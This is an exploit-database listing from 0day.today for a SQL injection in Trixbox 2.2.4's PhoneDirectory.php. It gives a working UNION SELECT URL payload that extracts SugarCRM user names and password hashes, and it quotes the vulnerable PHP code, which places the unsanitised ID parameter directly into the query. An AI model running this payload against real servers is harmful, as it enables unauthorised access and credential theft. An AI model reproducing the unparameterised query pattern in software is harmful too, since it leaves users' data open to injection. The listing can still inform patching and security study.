[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Trixbox PhonecDirectory.php SQL Injection Vulnerability

Author
NorSlacker
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-10980
Category
web applications
Date add
19-02-2010
Platform
unsorted
=======================================================
Trixbox PhonecDirectory.php SQL Injection Vulnerability
=======================================================

# Software Link: http://trixbox.org/downloads
# Version: 2.2.4
# Code :
http://server/cisco/services/PhoneDirectory.php?ID=1 [SQL INJECTION]
 
Example (Grab users / password hashes from sugarcrm)
http://server/cisco/services/PhoneDirectory.php?ID=1' UNION SELECT id,user_hash AS 'first_name',last_name,phone_home,user_name AS 'phone_work',user_hash AS 'phone_mobile',phone_other FROM users WHERE 1='1' GROUP BY 'id
 
 
PhoneDirectory.php vulnerable code:
# If the variable "ID" is passed in through the GET string, then display
# extension, phone number and cell phone number for that record with the dial
# key functionality
if ($ID) {
 $PersonDirectoryListing = "<CiscoIPPhoneDirectory>\n";
 
 $Query = "SELECT id, first_name, last_name, phone_home, phone_work, phone_mobile, phone_other ";
 $Query .= "FROM contacts WHERE id = '$ID' ";
 $Query .= "ORDER BY last_name ";
 $SelectPersonInfo = mysql_query($Query,$ConnectionSuccess);
 
 ...
 
}



#  0day.today [2024-12-25]  #